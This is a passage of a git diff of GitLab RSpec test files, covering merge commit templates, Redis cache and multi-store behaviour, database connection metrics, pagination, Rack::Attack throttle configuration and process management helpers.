let(:merge_commit_template) { <<~MSG.rstrip } - %{title} - - See merge request %{reference} - MSG - - it 'uses custom template' do - expect(subject.message).to eq <<~MSG.rstrip - Bugfix - - See merge request #{merge_request.to_reference(full: true)} - MSG - end - end - - context 'when project has merge commit template with closed issues' do - let(:merge_commit_template) { <<~MSG.rstrip } - Merge branch '%{source_branch}' into '%{target_branch}' - - %{title} - - %{issues} - - See merge request %{reference} - MSG - - it 'omits issues and new lines when no issues are mentioned in description' do - expect(subject.message).to eq <<~MSG.rstrip - Merge branch 'feature' into 'master' - - Bugfix - - See merge request #{merge_request.to_reference(full: true)} - MSG - end - - context 'when MR closes issues' do - let(:issue_1) { create(:issue, project: project) } - let(:issue_2) { create(:issue, project: project) } - let(:merge_request_description) { "Description\n\nclosing #{issue_1.to_reference}, #{issue_2.to_reference}" } - - it 'includes them and keeps new line characters' do - expect(subject.message).to eq <<~MSG.rstrip - Merge branch 'feature' into 'master' - - Bugfix - - Closes #{issue_1.to_reference} and #{issue_2.to_reference} - - See merge request #{merge_request.to_reference(full: true)} - MSG - end - end - end - - context 'when project has merge commit template with description' do - let(:merge_commit_template) { <<~MSG.rstrip } - Merge branch '%{source_branch}' into '%{target_branch}' - - %{title} - - %{description} - - See merge request %{reference} - MSG - - it 'uses template' do - expect(subject.message).to eq <<~MSG.rstrip - Merge branch 'feature' into 'master' - - Bugfix - - Merge Request Description - Next line - - See merge request #{merge_request.to_reference(full: true)} - MSG - end - - context 'when description is empty string' do - let(:merge_request_description) { '' } - - it 'skips description placeholder and removes new line characters before it' do 
- expect(subject.message).to eq <<~MSG.rstrip - Merge branch 'feature' into 'master' - - Bugfix - - See merge request #{merge_request.to_reference(full: true)} - MSG - end - end - - context 'when description is nil' do - let(:merge_request_description) { nil } - - it 'skips description placeholder and removes new line characters before it' do - expect(subject.message).to eq <<~MSG.rstrip - Merge branch 'feature' into 'master' - - Bugfix - - See merge request #{merge_request.to_reference(full: true)} - MSG - end - end - - context 'when description is blank string' do - let(:merge_request_description) { "\n\r \n" } - - it 'skips description placeholder and removes new line characters before it' do - expect(subject.message).to eq <<~MSG.rstrip - Merge branch 'feature' into 'master' - - Bugfix - - See merge request #{merge_request.to_reference(full: true)} - MSG - end - end - end - - context 'when custom merge commit template contains placeholder in the middle or beginning of the line' do - let(:merge_commit_template) { <<~MSG.rstrip } - Merge branch '%{source_branch}' into '%{target_branch}' - - %{description} %{title} - - See merge request %{reference} - MSG - - it 'uses custom template' do - expect(subject.message).to eq <<~MSG.rstrip - Merge branch 'feature' into 'master' - - Merge Request Description - Next line Bugfix - - See merge request #{merge_request.to_reference(full: true)} - MSG - end - - context 'when description is empty string' do - let(:merge_request_description) { '' } - - it 'does not remove new line characters before empty placeholder' do - expect(subject.message).to eq <<~MSG.rstrip - Merge branch 'feature' into 'master' - - Bugfix - - See merge request #{merge_request.to_reference(full: true)} - MSG - end - end - end - - context 'when project has template with CRLF newlines' do - let(:merge_commit_template) do - "Merge branch '%{source_branch}' into '%{target_branch}'\r\n\r\n%{title}\r\n\r\n%{description}\r\n\r\nSee merge request %{reference}" - 
end - - it 'converts it to LF newlines' do - expect(subject.message).to eq <<~MSG.rstrip - Merge branch 'feature' into 'master' - - Bugfix - - Merge Request Description - Next line - - See merge request #{merge_request.to_reference(full: true)} - MSG - end - - context 'when description is empty string' do - let(:merge_request_description) { '' } - - it 'skips description placeholder and removes new line characters before it' do - expect(subject.message).to eq <<~MSG.rstrip - Merge branch 'feature' into 'master' - - Bugfix - - See merge request #{merge_request.to_reference(full: true)} - MSG - end - end - end -end diff --git a/spec/lib/gitlab/merge_requests/mergeability/redis_interface_spec.rb b/spec/lib/gitlab/merge_requests/mergeability/redis_interface_spec.rb index e5475d04d86..2471faf76b2 100644 --- a/spec/lib/gitlab/merge_requests/mergeability/redis_interface_spec.rb +++ b/spec/lib/gitlab/merge_requests/mergeability/redis_interface_spec.rb @@ -2,7 +2,7 @@ require 'spec_helper' -RSpec.describe Gitlab::MergeRequests::Mergeability::RedisInterface, :clean_gitlab_redis_shared_state do +RSpec.describe Gitlab::MergeRequests::Mergeability::RedisInterface, :clean_gitlab_redis_cache do subject(:redis_interface) { described_class.new } let(:merge_check) { double(cache_key: '13') } @@ -11,17 +11,17 @@ RSpec.describe Gitlab::MergeRequests::Mergeability::RedisInterface, :clean_gitla describe '#save_check' do it 'saves the hash' do - expect(Gitlab::Redis::SharedState.with { |redis| redis.get(expected_key) }).to be_nil + expect(Gitlab::Redis::Cache.with { |redis| redis.get(expected_key) }).to be_nil redis_interface.save_check(merge_check: merge_check, result_hash: result_hash) - expect(Gitlab::Redis::SharedState.with { |redis| redis.get(expected_key) }).to eq result_hash.to_json + expect(Gitlab::Redis::Cache.with { |redis| redis.get(expected_key) }).to eq result_hash.to_json end end describe '#retrieve_check' do it 'returns the hash' do - Gitlab::Redis::SharedState.with { 
|redis| redis.set(expected_key, result_hash.to_json) } + Gitlab::Redis::Cache.with { |redis| redis.set(expected_key, result_hash.to_json) } expect(redis_interface.retrieve_check(merge_check: merge_check)).to eq result_hash end diff --git a/spec/lib/gitlab/metrics/exporter/base_exporter_spec.rb b/spec/lib/gitlab/metrics/exporter/base_exporter_spec.rb index e4f85243528..9cd1ef4094e 100644 --- a/spec/lib/gitlab/metrics/exporter/base_exporter_spec.rb +++ b/spec/lib/gitlab/metrics/exporter/base_exporter_spec.rb @@ -3,9 +3,9 @@ require 'spec_helper' RSpec.describe Gitlab::Metrics::Exporter::BaseExporter do - let(:exporter) { described_class.new } - let(:log_filename) { File.join(Rails.root, 'log', 'sidekiq_exporter.log') } let(:settings) { double('settings') } + let(:exporter) { described_class.new(settings) } + let(:log_filename) { File.join(Rails.root, 'log', 'sidekiq_exporter.log') } before do allow_any_instance_of(described_class).to receive(:log_filename).and_return(log_filename) diff --git a/spec/lib/gitlab/metrics/exporter/sidekiq_exporter_spec.rb b/spec/lib/gitlab/metrics/exporter/sidekiq_exporter_spec.rb index 01cf47a7c58..75bc3ba9626 100644 --- a/spec/lib/gitlab/metrics/exporter/sidekiq_exporter_spec.rb +++ b/spec/lib/gitlab/metrics/exporter/sidekiq_exporter_spec.rb @@ -3,7 +3,7 @@ require 'spec_helper' RSpec.describe Gitlab::Metrics::Exporter::SidekiqExporter do - let(:exporter) { described_class.new } + let(:exporter) { described_class.new(Settings.monitoring.sidekiq_exporter) } after do exporter.stop @@ -50,40 +50,4 @@ RSpec.describe Gitlab::Metrics::Exporter::SidekiqExporter do expect(exporter.log_filename).to end_with('sidekiq_exporter.log') end end - - context 'when port is already taken' do - let(:first_exporter) { described_class.new } - - before do - stub_config( - monitoring: { - sidekiq_exporter: { - enabled: true, - port: 9992, - address: '127.0.0.1' - } - } - ) - - first_exporter.start - end - - after do - first_exporter.stop - end - - it 'does 
print error message' do - expect(Sidekiq.logger).to receive(:error) - .with( - class: described_class.to_s, - message: 'Cannot start sidekiq_exporter', - 'exception.message' => anything) - - exporter.start - end - - it 'does not start thread' do - expect(exporter.start).to be_nil - end - end end diff --git a/spec/lib/gitlab/metrics/samplers/database_sampler_spec.rb b/spec/lib/gitlab/metrics/samplers/database_sampler_spec.rb index e97a4fdddcb..e8f8947c9e8 100644 --- a/spec/lib/gitlab/metrics/samplers/database_sampler_spec.rb +++ b/spec/lib/gitlab/metrics/samplers/database_sampler_spec.rb @@ -8,44 +8,169 @@ RSpec.describe Gitlab::Metrics::Samplers::DatabaseSampler do it_behaves_like 'metrics sampler', 'DATABASE_SAMPLER' describe '#sample' do + let(:main_labels) do + { + class: 'ActiveRecord::Base', + host: ApplicationRecord.database.config['host'], + port: ApplicationRecord.database.config['port'], + db_config_name: 'main' + } + end + + let(:ci_labels) do + { + class: 'Ci::ApplicationRecord', + host: Ci::ApplicationRecord.database.config['host'], + port: Ci::ApplicationRecord.database.config['port'], + db_config_name: 'ci' + } + end + + let(:main_replica_labels) do + { + class: 'ActiveRecord::Base', + host: 'main-replica-host', + port: 2345, + db_config_name: 'main_replica' + } + end + + let(:ci_replica_labels) do + { + class: 'Ci::ApplicationRecord', + host: 'ci-replica-host', + port: 3456, + db_config_name: 'ci_replica' + } + end + before do described_class::METRIC_DESCRIPTIONS.each_key do |metric| allow(subject.metrics[metric]).to receive(:set) end + + allow(Gitlab::Database).to receive(:database_base_models) + .and_return({ main: ActiveRecord::Base, ci: Ci::ApplicationRecord }) end - context 'for ActiveRecord::Base' do - let(:labels) do - { - class: 'ActiveRecord::Base', - host: ApplicationRecord.database.config['host'], - port: ApplicationRecord.database.config['port'] - } + context 'when all base models are connected', :add_ci_connection do + it 'samples 
connection pool statistics for all primaries' do + expect_metrics_with_labels(main_labels) + expect_metrics_with_labels(ci_labels) + + subject.sample end - context 'when the database is connected' do - it 'samples connection pool statistics' do - expect(subject.metrics[:size]).to receive(:set).with(labels, a_value >= 1) - expect(subject.metrics[:connections]).to receive(:set).with(labels, a_value >= 1) - expect(subject.metrics[:busy]).to receive(:set).with(labels, a_value >= 1) - expect(subject.metrics[:dead]).to receive(:set).with(labels, a_value >= 0) - expect(subject.metrics[:waiting]).to receive(:set).with(labels, a_value >= 0) + context 'when replica hosts are configured' do + let(:main_load_balancer) { ActiveRecord::Base.load_balancer } # rubocop:disable Database/MultipleDatabases + let(:main_replica_host) { main_load_balancer.host } + + let(:ci_load_balancer) { double(:load_balancer, host_list: ci_host_list, configuration: configuration) } + let(:configuration) { double(:configuration, primary_connection_specification_name: 'Ci::ApplicationRecord') } + let(:ci_host_list) { double(:host_list, hosts: [ci_replica_host]) } + let(:ci_replica_host) { double(:host, connection: ci_connection) } + let(:ci_connection) { double(:connection, pool: Ci::ApplicationRecord.connection_pool) } + + before do + allow(Gitlab::Database::LoadBalancing).to receive(:each_load_balancer) + .and_return([main_load_balancer, ci_load_balancer].to_enum) + + allow(main_load_balancer).to receive(:primary_only?).and_return(false) + allow(ci_load_balancer).to receive(:primary_only?).and_return(false) + + allow(main_replica_host).to receive(:host).and_return('main-replica-host') + allow(ci_replica_host).to receive(:host).and_return('ci-replica-host') + + allow(main_replica_host).to receive(:port).and_return(2345) + allow(ci_replica_host).to receive(:port).and_return(3456) + + allow(Gitlab::Database).to receive(:db_config_name) + .with(main_replica_host.connection) + .and_return('main_replica') 
+ + allow(Gitlab::Database).to receive(:db_config_name) + .with(ci_replica_host.connection) + .and_return('ci_replica') + end + + it 'samples connection pool statistics for primaries and replicas' do + expect_metrics_with_labels(main_labels) + expect_metrics_with_labels(ci_labels) + expect_metrics_with_labels(main_replica_labels) + expect_metrics_with_labels(ci_replica_labels) subject.sample end end + end + + context 'when a base model is not connected', :add_ci_connection do + before do + allow(Ci::ApplicationRecord).to receive(:connected?).and_return(false) + end + + it 'records no samples for that primary' do + expect_metrics_with_labels(main_labels) + expect_no_metrics_with_labels(ci_labels) + + subject.sample + end + + context 'when the base model has replica connections' do + let(:main_load_balancer) { ActiveRecord::Base.load_balancer } # rubocop:disable Database/MultipleDatabases + let(:main_replica_host) { main_load_balancer.host } + + let(:ci_load_balancer) { double(:load_balancer, host_list: ci_host_list, configuration: configuration) } + let(:configuration) { double(:configuration, primary_connection_specification_name: 'Ci::ApplicationRecord') } + let(:ci_host_list) { double(:host_list, hosts: [ci_replica_host]) } + let(:ci_replica_host) { double(:host, connection: ci_connection) } + let(:ci_connection) { double(:connection, pool: Ci::ApplicationRecord.connection_pool) } - context 'when the database is not connected' do before do - allow(ActiveRecord::Base).to receive(:connected?).and_return(false) + allow(Gitlab::Database::LoadBalancing).to receive(:each_load_balancer) + .and_return([main_load_balancer, ci_load_balancer].to_enum) + + allow(main_load_balancer).to receive(:primary_only?).and_return(false) + allow(ci_load_balancer).to receive(:primary_only?).and_return(false) + + allow(main_replica_host).to receive(:host).and_return('main-replica-host') + allow(ci_replica_host).to receive(:host).and_return('ci-replica-host') + + 
allow(main_replica_host).to receive(:port).and_return(2345) + allow(ci_replica_host).to receive(:port).and_return(3456) + + allow(Gitlab::Database).to receive(:db_config_name) + .with(main_replica_host.connection) + .and_return('main_replica') + + allow(Gitlab::Database).to receive(:db_config_name) + .with(ci_replica_host.connection) + .and_return('ci_replica') end - it 'records no samples' do - expect(subject.metrics[:size]).not_to receive(:set).with(labels, anything) + it 'still records the replica metrics' do + expect_metrics_with_labels(main_labels) + expect_metrics_with_labels(main_replica_labels) + expect_no_metrics_with_labels(ci_labels) + expect_metrics_with_labels(ci_replica_labels) subject.sample end end end + + def expect_metrics_with_labels(labels) + expect(subject.metrics[:size]).to receive(:set).with(labels, a_value >= 1) + expect(subject.metrics[:connections]).to receive(:set).with(labels, a_value >= 1) + expect(subject.metrics[:busy]).to receive(:set).with(labels, a_value >= 1) + expect(subject.metrics[:dead]).to receive(:set).with(labels, a_value >= 0) + expect(subject.metrics[:waiting]).to receive(:set).with(labels, a_value >= 0) + end + + def expect_no_metrics_with_labels(labels) + described_class::METRIC_DESCRIPTIONS.each_key do |metric| + expect(subject.metrics[metric]).not_to receive(:set).with(labels, anything) + end + end end end diff --git a/spec/lib/gitlab/metrics/subscribers/active_record_spec.rb b/spec/lib/gitlab/metrics/subscribers/active_record_spec.rb index a8e4f039da4..389b0ef1044 100644 --- a/spec/lib/gitlab/metrics/subscribers/active_record_spec.rb +++ b/spec/lib/gitlab/metrics/subscribers/active_record_spec.rb @@ -198,6 +198,7 @@ RSpec.describe Gitlab::Metrics::Subscribers::ActiveRecord do context 'query using a connection to a replica' do before do allow(Gitlab::Database::LoadBalancing).to receive(:db_role_for_connection).and_return(:replica) + allow(connection).to receive_message_chain(:pool, :db_config, 
:name).and_return(db_config_name) end it 'queries connection db role' do diff --git a/spec/lib/gitlab/multi_collection_paginator_spec.rb b/spec/lib/gitlab/multi_collection_paginator_spec.rb index c7c8f4f969f..080b3382684 100644 --- a/spec/lib/gitlab/multi_collection_paginator_spec.rb +++ b/spec/lib/gitlab/multi_collection_paginator_spec.rb @@ -40,7 +40,7 @@ RSpec.describe Gitlab::MultiCollectionPaginator do end it 'fils the last page with elements from the second collection' do - expected_collection = all_groups[-2..-1] + expected_collection = all_groups[-2..] expect(paginator.paginate(3)).to eq(expected_collection) end diff --git a/spec/lib/gitlab/pagination/keyset/order_spec.rb b/spec/lib/gitlab/pagination/keyset/order_spec.rb index 3c14d91fdfd..1bed8e542a2 100644 --- a/spec/lib/gitlab/pagination/keyset/order_spec.rb +++ b/spec/lib/gitlab/pagination/keyset/order_spec.rb @@ -127,7 +127,7 @@ RSpec.describe Gitlab::Pagination::Keyset::Order do end it do - expect(subject).to eq(expected.reverse[1..-1]) # removing one item because we used it to calculate cursor data for the "last" page in subject + expect(subject).to eq(expected.reverse[1..]) # removing one item because we used it to calculate cursor data for the "last" page in subject end end end diff --git a/spec/lib/gitlab/pagination/offset_pagination_spec.rb b/spec/lib/gitlab/pagination/offset_pagination_spec.rb index ffecbb06ff8..f8d50fbc517 100644 --- a/spec/lib/gitlab/pagination/offset_pagination_spec.rb +++ b/spec/lib/gitlab/pagination/offset_pagination_spec.rb @@ -82,7 +82,7 @@ RSpec.describe Gitlab::Pagination::OffsetPagination do context 'when the api_kaminari_count_with_limit feature flag is enabled' do before do - stub_feature_flags(api_kaminari_count_with_limit: true, lower_relation_max_count_limit: false) + stub_feature_flags(api_kaminari_count_with_limit: true) end context 'when resources count is less than MAX_COUNT_LIMIT' do @@ -120,41 +120,6 @@ RSpec.describe Gitlab::Pagination::OffsetPagination do 
end end - context 'when lower_relation_max_count_limit FF is enabled' do - before do - stub_feature_flags(lower_relation_max_count_limit: true) - end - - it_behaves_like 'paginated response' - it_behaves_like 'response with pagination headers' - - context 'when limit is met' do - before do - stub_const("::Kaminari::ActiveRecordRelationMethods::MAX_COUNT_NEW_LOWER_LIMIT", 2) - end - - it_behaves_like 'paginated response' - - it 'does not return the X-Total and X-Total-Pages headers' do - expect_no_header('X-Total') - expect_no_header('X-Total-Pages') - expect_header('X-Per-Page', '2') - expect_header('X-Page', '1') - expect_header('X-Next-Page', '2') - expect_header('X-Prev-Page', '') - - expect_header('Link', anything) do |_key, val| - expect(val).to include(%Q(<#{incoming_api_projects_url}?#{query.merge(page: 1).to_query}>; rel="first")) - expect(val).to include(%Q(<#{incoming_api_projects_url}?#{query.merge(page: 2).to_query}>; rel="next")) - expect(val).not_to include('rel="last"') - expect(val).not_to include('rel="prev"') - end - - subject.paginate(resource) - end - end - end - it 'does not return the total headers when excluding them' do expect_no_header('X-Total') expect_no_header('X-Total-Pages') diff --git a/spec/lib/gitlab/patch/legacy_database_config_spec.rb b/spec/lib/gitlab/patch/legacy_database_config_spec.rb index e6c0bdbf360..b87e16f31ae 100644 --- a/spec/lib/gitlab/patch/legacy_database_config_spec.rb +++ b/spec/lib/gitlab/patch/legacy_database_config_spec.rb @@ -11,6 +11,9 @@ RSpec.describe Gitlab::Patch::LegacyDatabaseConfig do let(:configuration) { Rails::Application::Configuration.new(Rails.root) } before do + allow(File).to receive(:exist?).and_call_original + allow(File).to receive(:exist?).with(Rails.root.join("config/database_geo.yml")).and_return(false) + # The `AS::ConfigurationFile` calls `read` in `def initialize` # thus we cannot use `expect_next_instance_of` # rubocop:disable RSpec/AnyInstanceOf diff --git 
a/spec/lib/gitlab/process_management_spec.rb b/spec/lib/gitlab/process_management_spec.rb new file mode 100644 index 00000000000..a71a476b540 --- /dev/null +++ b/spec/lib/gitlab/process_management_spec.rb @@ -0,0 +1,144 @@ +# frozen_string_literal: true + +require_relative '../../../lib/gitlab/process_management' + +RSpec.describe Gitlab::ProcessManagement do + describe '.trap_signals' do + it 'traps the given signals' do + expect(described_class).to receive(:trap).ordered.with(:INT) + expect(described_class).to receive(:trap).ordered.with(:HUP) + + described_class.trap_signals(%i(INT HUP)) + end + end + + describe '.modify_signals' do + it 'traps the given signals with the given command' do + expect(described_class).to receive(:trap).ordered.with(:INT, 'DEFAULT') + expect(described_class).to receive(:trap).ordered.with(:HUP, 'DEFAULT') + + described_class.modify_signals(%i(INT HUP), 'DEFAULT') + end + end + + describe '.signal_processes' do + it 'sends a signal to every given process' do + expect(described_class).to receive(:signal).with(1, :INT) + + described_class.signal_processes([1], :INT) + end + end + + describe '.signal' do + it 'sends a signal to the given process' do + allow(Process).to receive(:kill).with(:INT, 4) + expect(described_class.signal(4, :INT)).to eq(true) + end + + it 'returns false when the process does not exist' do + allow(Process).to receive(:kill).with(:INT, 4).and_raise(Errno::ESRCH) + expect(described_class.signal(4, :INT)).to eq(false) + end + end + + describe '.wait_async' do + it 'waits for a process in a separate thread' do + thread = described_class.wait_async(Process.spawn('true')) + + # Upon success Process.wait just returns the PID. + expect(thread.value).to be_a_kind_of(Numeric) + end + end + + # In the X_alive? checks, we check negative PIDs sometimes as a simple way + # to be sure the pids are definitely for non-existent processes. 
+ # Note that -1 is special, and sends the signal to every process we have permission + # for, so we use -2, -3 etc + describe '.all_alive?' do + it 'returns true if all processes are alive' do + processes = [Process.pid] + + expect(described_class.all_alive?(processes)).to eq(true) + end + + it 'returns false when a thread was not alive' do + processes = [-2] + + expect(described_class.all_alive?(processes)).to eq(false) + end + end + + describe '.process_alive?' do + it 'returns true if the process is alive' do + process = Process.pid + + expect(described_class.process_alive?(process)).to eq(true) + end + + it 'returns false when a thread was not alive' do + process = -2 + + expect(described_class.process_alive?(process)).to eq(false) + end + + it 'returns false when no pid is given' do + process = nil + + expect(described_class.process_alive?(process)).to eq(false) + end + end + + describe '.process_died?' do + it 'returns false if the process is alive' do + process = Process.pid + + expect(described_class.process_died?(process)).to eq(false) + end + + it 'returns true when a thread was not alive' do + process = -2 + + expect(described_class.process_died?(process)).to eq(true) + end + + it 'returns true when no pid is given' do + process = nil + + expect(described_class.process_died?(process)).to eq(true) + end + end + + describe '.pids_alive' do + it 'returns the pids that are alive, from a given array' do + pids = [Process.pid, -2] + + expect(described_class.pids_alive(pids)).to match_array([Process.pid]) + end + end + + describe '.any_alive?' 
do + it 'returns true if at least one process is alive' do + processes = [Process.pid, -2] + + expect(described_class.any_alive?(processes)).to eq(true) + end + + it 'returns false when all threads are dead' do + processes = [-2, -3] + + expect(described_class.any_alive?(processes)).to eq(false) + end + end + + describe '.write_pid' do + it 'writes the PID of the current process to the given file' do + handle = double(:handle) + + allow(File).to receive(:open).with('/dev/null', 'w').and_yield(handle) + + expect(handle).to receive(:write).with(Process.pid.to_s) + + described_class.write_pid('/dev/null') + end + end +end diff --git a/spec/lib/gitlab/quick_actions/dsl_spec.rb b/spec/lib/gitlab/quick_actions/dsl_spec.rb index f990abfb253..942d347424f 100644 --- a/spec/lib/gitlab/quick_actions/dsl_spec.rb +++ b/spec/lib/gitlab/quick_actions/dsl_spec.rb @@ -96,8 +96,8 @@ RSpec.describe Gitlab::QuickActions::Dsl do expect(dynamic_description_def.name).to eq(:dynamic_description) expect(dynamic_description_def.aliases).to eq([]) - expect(dynamic_description_def.to_h(OpenStruct.new(noteable: 'issue'))[:description]).to eq('A dynamic description for ISSUE') - expect(dynamic_description_def.execute_message(OpenStruct.new(noteable: 'issue'), 'arg')).to eq('A dynamic execution message for ISSUE passing arg') + expect(dynamic_description_def.to_h(double('desc', noteable: 'issue'))[:description]).to eq('A dynamic description for ISSUE') + expect(dynamic_description_def.execute_message(double('desc', noteable: 'issue'), 'arg')).to eq('A dynamic execution message for ISSUE passing arg') expect(dynamic_description_def.params).to eq(['The first argument', 'The second argument']) expect(dynamic_description_def.condition_block).to be_nil expect(dynamic_description_def.types).to eq([]) diff --git a/spec/lib/gitlab/rack_attack_spec.rb b/spec/lib/gitlab/rack_attack_spec.rb index 8f03905e08d..39ea02bad8b 100644 --- a/spec/lib/gitlab/rack_attack_spec.rb +++ 
b/spec/lib/gitlab/rack_attack_spec.rb @@ -5,8 +5,8 @@ require 'spec_helper' RSpec.describe Gitlab::RackAttack, :aggregate_failures do describe '.configure' do let(:fake_rack_attack) { class_double("Rack::Attack") } - let(:fake_rack_attack_request) { class_double("Rack::Attack::Request") } - let(:fake_cache) { instance_double("Rack::Attack::Cache") } + let(:fake_rack_attack_request) { class_double(Rack::Attack::Request) } + let(:fake_cache) { instance_double(Rack::Attack::Cache) } let(:throttles) do { @@ -27,9 +27,6 @@ RSpec.describe Gitlab::RackAttack, :aggregate_failures do end before do - stub_const("Rack::Attack", fake_rack_attack) - stub_const("Rack::Attack::Request", fake_rack_attack_request) - allow(fake_rack_attack).to receive(:throttled_response=) allow(fake_rack_attack).to receive(:throttle) allow(fake_rack_attack).to receive(:track) @@ -37,6 +34,9 @@ RSpec.describe Gitlab::RackAttack, :aggregate_failures do allow(fake_rack_attack).to receive(:blocklist) allow(fake_rack_attack).to receive(:cache).and_return(fake_cache) allow(fake_cache).to receive(:store=) + + fake_rack_attack.const_set('Request', fake_rack_attack_request) + stub_const("Rack::Attack", fake_rack_attack) end it 'extends the request class' do @@ -78,7 +78,7 @@ RSpec.describe Gitlab::RackAttack, :aggregate_failures do it 'configures tracks and throttles with a selected set of dry-runs' do dry_run_throttles = throttles.each_key.first(2) - regular_throttles = throttles.keys[2..-1] + regular_throttles = throttles.keys[2..] 
stub_env('GITLAB_THROTTLE_DRY_RUN', dry_run_throttles.join(',')) described_class.configure(fake_rack_attack) diff --git a/spec/lib/gitlab/rate_limit_helpers_spec.rb b/spec/lib/gitlab/rate_limit_helpers_spec.rb deleted file mode 100644 index ad0e2de1448..00000000000 --- a/spec/lib/gitlab/rate_limit_helpers_spec.rb +++ /dev/null @@ -1,50 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::RateLimitHelpers, :clean_gitlab_redis_rate_limiting do - let(:limiter_class) do - Class.new do - include ::Gitlab::RateLimitHelpers - - attr_reader :request - - def initialize(request) - @request = request - end - end - end - - let(:request) { instance_double(ActionDispatch::Request, request_method: 'GET', ip: '127.0.0.1', fullpath: '/') } - let(:class_instance) { limiter_class.new(request) } - - let_it_be(:user) { create(:user) } - let_it_be(:project) { create(:project) } - - describe '#archive_rate_limit_reached?' do - context 'with a user' do - it 'rate limits the user properly' do - 5.times do - expect(class_instance.archive_rate_limit_reached?(user, project)).to be_falsey - end - - expect(class_instance.archive_rate_limit_reached?(user, project)).to be_truthy - end - end - - context 'with an anonymous user' do - before do - stub_const('Gitlab::RateLimitHelpers::ARCHIVE_RATE_ANONYMOUS_THRESHOLD', 2) - end - - it 'rate limits with higher limits' do - 2.times do - expect(class_instance.archive_rate_limit_reached?(nil, project)).to be_falsey - end - - expect(class_instance.archive_rate_limit_reached?(nil, project)).to be_truthy - expect(class_instance.archive_rate_limit_reached?(user, project)).to be_falsey - end - end - end -end diff --git a/spec/lib/gitlab/redis/multi_store_spec.rb b/spec/lib/gitlab/redis/multi_store_spec.rb index bf1bf65bb9b..76731bb916c 100644 --- a/spec/lib/gitlab/redis/multi_store_spec.rb +++ b/spec/lib/gitlab/redis/multi_store_spec.rb @@ -27,6 +27,11 @@ RSpec.describe Gitlab::Redis::MultiStore do subject { 
multi_store.send(name, *args) } + before do + skip_feature_flags_yaml_validation + skip_default_enabled_yaml_check + end + after(:all) do primary_store.flushdb secondary_store.flushdb @@ -48,6 +53,15 @@ RSpec.describe Gitlab::Redis::MultiStore do end end + context 'when instance_name is nil' do + let(:instance_name) { nil } + let(:multi_store) { described_class.new(primary_store, secondary_store, instance_name)} + + it 'fails with exception' do + expect { multi_store }.to raise_error(ArgumentError, /instance_name is required/) + end + end + context 'when primary_store is not a ::Redis instance' do before do allow(primary_store).to receive(:is_a?).with(::Redis).and_return(false) @@ -114,6 +128,12 @@ RSpec.describe Gitlab::Redis::MultiStore do end RSpec.shared_examples_for 'fallback read from the secondary store' do + let(:counter) { Gitlab::Metrics::NullMetric.instance } + + before do + allow(Gitlab::Metrics).to receive(:counter).and_return(counter) + end + it 'fallback and execute on secondary instance' do expect(secondary_store).to receive(name).with(*args).and_call_original @@ -128,7 +148,7 @@ RSpec.describe Gitlab::Redis::MultiStore do end it 'increment read fallback count metrics' do - expect(multi_store).to receive(:increment_read_fallback_count).with(name) + expect(counter).to receive(:increment).with(command: name, instance_name: instance_name) subject end @@ -169,9 +189,9 @@ RSpec.describe Gitlab::Redis::MultiStore do allow(secondary_store).to receive(name).and_call_original end - context 'with feature flag :use_multi_store enabled' do + context 'with feature flag :use_primary_and_secondary_stores_for_test_store' do before do - stub_feature_flags(use_multi_store: true) + stub_feature_flags(use_primary_and_secondary_stores_for_test_store: true) end context 'when reading from the primary is successful' do @@ -246,12 +266,38 @@ RSpec.describe Gitlab::Redis::MultiStore do end end - context 'with feature flag :use_multi_store is disabled' do + context 'with 
feature flag :use_primary_and_secondary_stores_for_test_store' do before do - stub_feature_flags(use_multi_store: false) + stub_feature_flags(use_primary_and_secondary_stores_for_test_store: false) end - it_behaves_like 'secondary store' + context 'with feature flag :use_primary_store_as_default_for_test_store is disabled' do + before do + stub_feature_flags(use_primary_store_as_default_for_test_store: false) + end + + it_behaves_like 'secondary store' + end + + context 'with feature flag :use_primary_store_as_default_for_test_store is enabled' do + before do + stub_feature_flags(use_primary_store_as_default_for_test_store: true) + end + + it 'execute on the primary instance' do + expect(primary_store).to receive(name).with(*args).and_call_original + + subject + end + + include_examples 'reads correct value' + + it 'does not execute on the secondary store' do + expect(secondary_store).not_to receive(name) + + subject + end + end end context 'with both primary and secondary store using same redis instance' do @@ -329,9 +375,9 @@ RSpec.describe Gitlab::Redis::MultiStore do allow(secondary_store).to receive(name).and_call_original end - context 'with feature flag :use_multi_store enabled' do + context 'with feature flag :use_primary_and_secondary_stores_for_test_store' do before do - stub_feature_flags(use_multi_store: true) + stub_feature_flags(use_primary_and_secondary_stores_for_test_store: true) end context 'when executing on primary instance is successful' do @@ -382,35 +428,57 @@ RSpec.describe Gitlab::Redis::MultiStore do end end - context 'with feature flag :use_multi_store is disabled' do + context 'with feature flag :use_primary_and_secondary_stores_for_test_store is disabled' do before do - stub_feature_flags(use_multi_store: false) + stub_feature_flags(use_primary_and_secondary_stores_for_test_store: false) end - it 'executes only on the secondary redis store', :aggregate_errors do - expect(secondary_store).to receive(name).with(*expected_args) - 
expect(primary_store).not_to receive(name).with(*expected_args) + context 'with feature flag :use_primary_store_as_default_for_test_store is disabled' do + before do + stub_feature_flags(use_primary_store_as_default_for_test_store: false) + end + + it 'executes only on the secondary redis store', :aggregate_errors do + expect(secondary_store).to receive(name).with(*expected_args) + expect(primary_store).not_to receive(name).with(*expected_args) + + subject + end - subject + include_examples 'verify that store contains values', :secondary_store end - include_examples 'verify that store contains values', :secondary_store + context 'with feature flag :use_primary_store_as_default_for_test_store is enabled' do + before do + stub_feature_flags(use_primary_store_as_default_for_test_store: true) + end + + it 'executes only on the primary_redis redis store', :aggregate_errors do + expect(primary_store).to receive(name).with(*expected_args) + expect(secondary_store).not_to receive(name).with(*expected_args) + + subject + end + + include_examples 'verify that store contains values', :primary_store + end end end end end context 'with unsupported command' do + let(:counter) { Gitlab::Metrics::NullMetric.instance } + before do primary_store.flushdb secondary_store.flushdb + allow(Gitlab::Metrics).to receive(:counter).and_return(counter) end let_it_be(:key) { "redis:counter" } - subject do - multi_store.incr(key) - end + subject { multi_store.incr(key) } it 'executes method missing' do expect(multi_store).to receive(:method_missing) @@ -418,31 +486,75 @@ RSpec.describe Gitlab::Redis::MultiStore do subject end - it 'logs MethodMissingError' do - expect(Gitlab::ErrorTracking).to receive(:log_exception).with(an_instance_of(Gitlab::Redis::MultiStore::MethodMissingError), - hash_including(command_name: :incr, extra: hash_including(instance_name: instance_name))) + context 'when command is not in SKIP_LOG_METHOD_MISSING_FOR_COMMANDS' do + it 'logs MethodMissingError' do + 
